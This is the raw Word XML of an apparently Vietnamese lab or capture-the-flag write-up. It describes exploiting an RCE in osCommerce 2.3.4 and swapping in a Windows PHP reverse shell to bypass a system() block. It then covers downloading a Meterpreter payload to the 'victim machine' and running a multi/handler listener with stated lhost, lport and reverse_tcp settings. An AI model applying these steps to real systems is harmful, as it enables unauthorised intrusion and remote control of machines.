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2ACAD" w14:textId="521DF701" w:rsidR="002F49FE" w:rsidRDefault="00CB2E4B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32E231C2" wp14:editId="4CCF91EC">
            <wp:extent cx="5943600" cy="5140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6299CD42" w14:textId="41644C65" w:rsidR="00CB2E4B" w:rsidRDefault="00CB2E4B"/>
    <w:p w14:paraId="3FD39C5A" w14:textId="5D4BC362" w:rsidR="00CB2E4B" w:rsidRDefault="00DF1A86">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B1EBB66" wp14:editId="733542AC">
            <wp:extent cx="5943600" cy="1815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14:paraId="3E936D07" w14:textId="38CA8AFF" w:rsidR="00DF1A86" w:rsidRDefault="00DF1A86">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D43303A" w14:textId="1DA128AE" w:rsidR="00DF1A86" w:rsidRDefault="008872E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sau khi giành thời gian phân tích network shares, cố gắng tìm kiếm thư mục bị ẩn trong dịch vụ HTTP, có vẻ như phần thú vị nhất là oscommerce trên cổng 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA26E15" w14:textId="5465F16C" w:rsidR="008872E5" w:rsidRDefault="008872E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EB953F" w14:textId="4D2E1732" w:rsidR="008872E5" w:rsidRDefault="008872E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tìm kiếm các khai thác đối với oscommerce phiên bản 2.3.4, một trong số đó liên quan đến RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CBBC4" w14:textId="40FC4FE7" w:rsidR="008872E5" w:rsidRDefault="008872E5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A923AF1" w14:textId="566875F9" w:rsidR="008872E5" w:rsidRDefault="00D20638">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299FDE9A" wp14:editId="5242594B">
            <wp:extent cx="4328795" cy="3321934"/>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r="27167" b="10572"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4328932" cy="3322039"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD8711" w14:textId="77777777" w:rsidR="00851E43" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D962294" w14:textId="40D4AB33" w:rsidR="00D20638" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D20638">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ải nó về</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D20638">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Script được khởi tạo mặc định với payload của Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8A4A3" w14:textId="7B90C446" w:rsidR="00851E43" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC6A112" w14:textId="4C37D5C9" w:rsidR="00851E43" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tìm kiếm Windows PHP Reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15116720" w14:textId="57ADE7B4" w:rsidR="00851E43" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="459EBD41" w14:textId="0E7B8B4A" w:rsidR="00851E43" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bây giờ chúng ta cần điều chỉnh payload để include được shell này. Đây là phiên bản cuối của khai thác. Chúng ta chỉ cần thay đổi lhost, lport.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B5725" w14:textId="466B084C" w:rsidR="00851E43" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="132A2DFE" w14:textId="7C5F44CD" w:rsidR="00851E43" w:rsidRDefault="004D7393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="058465BE" wp14:editId="47A4124F">
            <wp:extent cx="5943600" cy="3855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855720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF6016" w14:textId="7B3D2AAC" w:rsidR="004D7393" w:rsidRDefault="004D7393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114B2FBC" w14:textId="32F15BCC" w:rsidR="004D7393" w:rsidRDefault="004D7393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trang web chặn lệnh system. Bạn phải thay lệnh system() là exec()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705B77E0" w14:textId="0012B341" w:rsidR="004D7393" w:rsidRDefault="004D7393">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68738739" w14:textId="57E28375" w:rsidR="004D7393" w:rsidRDefault="00063D57">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F9EE805" wp14:editId="415E40A3">
            <wp:extent cx="5943600" cy="805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805815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D9FBF8" w14:textId="70A4121D" w:rsidR="00063D57" w:rsidRDefault="00063D57">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6157C524" w14:textId="5E1808ED" w:rsidR="00063D57" w:rsidRDefault="00741B66">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="678C437B" wp14:editId="0C3165B8">
            <wp:extent cx="5943600" cy="2292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14:paraId="5B1B5811" w14:textId="430E7A90" w:rsidR="00741B66" w:rsidRDefault="00741B66">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D80BFDB" w14:textId="06E39599" w:rsidR="00741B66" w:rsidRDefault="00DC1708">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A0C20E1" wp14:editId="17287A2C">
            <wp:extent cx="4803494" cy="17000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823054" cy="1706972"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EEB71E" w14:textId="57F3DE00" w:rsidR="00DC1708" w:rsidRDefault="00DC1708">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4198999D" w14:textId="0E861CDB" w:rsidR="00DC1708" w:rsidRDefault="00F71E2B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35ECCC9B" wp14:editId="46D3BB48">
            <wp:extent cx="5943600" cy="6250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69188" cy="627724"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0DB9A7" w14:textId="0B980913" w:rsidR="00C10658" w:rsidRDefault="00C10658">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A0C35D" w14:textId="139A0187" w:rsidR="00C10658" w:rsidRPr="00C10658" w:rsidRDefault="00C10658">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10658">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upload to Meterpreter shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16395BC8" w14:textId="4DAB607E" w:rsidR="00C10658" w:rsidRDefault="00C10658">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A1A009" w14:textId="49F7C2F9" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tạo payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CCB94" w14:textId="40FF959C" w:rsidR="00C10658" w:rsidRDefault="00CF3B65">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2189E384" wp14:editId="2E5D3F36">
            <wp:extent cx="5943600" cy="1390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90015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="281B62A2" w14:textId="3DA395FA" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C1FAAD9" w14:textId="76E28BDD" w:rsidR="00CF3B65" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tải payload về máy nạn nhân:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EB1604" w14:textId="6C1C9159" w:rsidR="00CF3B65" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2528378D" wp14:editId="5D4225A7">
            <wp:extent cx="5943600"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1F00EB1C" w14:textId="0A7291DB" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410F77">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực thi: reverse-shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852442A" w14:textId="370DF5A5" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D95947B" w14:textId="3418A1AB" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ở máy cục bộ, mở listener (use exploit/multi/handler); set lhost=10.8.55.148, lport=1234, payload=windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189F682" w14:textId="5978F90E" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410F77">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F77DBB" w14:textId="2FFEE4C1" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609A8C77" w14:textId="350E5D12" w:rsidR="00C4033C" w:rsidRDefault="001A11AD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D7EC282" wp14:editId="470F67CF">
            <wp:extent cx="5943600" cy="95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p>
    <w:p w14:paraId="03155276" w14:textId="640920F4" w:rsidR="001A11AD" w:rsidRDefault="001A11AD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D42114D" w14:textId="7F5D6776" w:rsidR="001A11AD" w:rsidRDefault="004D6BFF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C05DF5" wp14:editId="35FD6C9E">
            <wp:extent cx="5943600" cy="56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564515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D572708" w14:textId="53813FD6" w:rsidR="00EA212D" w:rsidRDefault="00EA212D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207ADE18" w14:textId="35DF603B" w:rsidR="00EA212D" w:rsidRDefault="00EA212D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="557B867B" wp14:editId="42F2CD95">
            <wp:extent cx="5943600" cy="371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4AC7D23" w14:textId="77777777" w:rsidR="00410F77" w:rsidRDefault="00410F77">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6708D527" w14:textId="58E6207E" w:rsidR="00F71E2B" w:rsidRDefault="00F71E2B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F796E1F" w14:textId="77777777" w:rsidR="00F71E2B" w:rsidRDefault="00F71E2B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31853DE5" w14:textId="5FA4517B" w:rsidR="00851E43" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD6CCFA" w14:textId="77777777" w:rsidR="00851E43" w:rsidRPr="008872E5" w:rsidRDefault="00851E43">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00851E43" w:rsidRPr="008872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F09"/>
    <w:rsid w:val="00063D57"/>
    <w:rsid w:val="001A11AD"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00410F77"/>
    <w:rsid w:val="004D6BFF"/>
    <w:rsid w:val="004D7393"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00741B66"/>
    <w:rsid w:val="00851E43"/>
    <w:rsid w:val="008872E5"/>
    <w:rsid w:val="00B36307"/>
    <w:rsid w:val="00B602D4"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C10658"/>
    <w:rsid w:val="00C4033C"/>
    <w:rsid w:val="00C84F09"/>
    <w:rsid w:val="00CB2E4B"/>
    <w:rsid w:val="00CF3B65"/>
    <w:rsid w:val="00D20638"/>
    <w:rsid w:val="00DC1708"/>
    <w:rsid w:val="00DF1A86"/>
    <w:rsid w:val="00EA212D"/>
    <w:rsid w:val="00F71E2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F9B3F36"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FC3DD3BF-0D03-BB4D-BABF-7E9E4393C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126</Words>
  <Characters>724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2024-02-12T05:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-12T09:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>